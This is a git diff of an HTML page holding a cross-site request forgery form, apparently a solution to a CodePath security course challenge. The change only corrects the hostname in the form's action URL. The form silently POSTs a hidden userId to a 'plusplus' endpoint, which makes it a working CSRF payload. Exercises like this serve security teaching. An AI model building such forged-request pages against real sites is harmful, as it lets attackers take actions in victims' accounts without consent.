--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <body>
-<form name="csrfForm" action="https://www.security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
+<form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
  <input type="hidden" name="userId" value="79f2196951c0ce18c62f6ede76c5c4df19f0f0eb" />
  <input type="submit"/>
 </form>
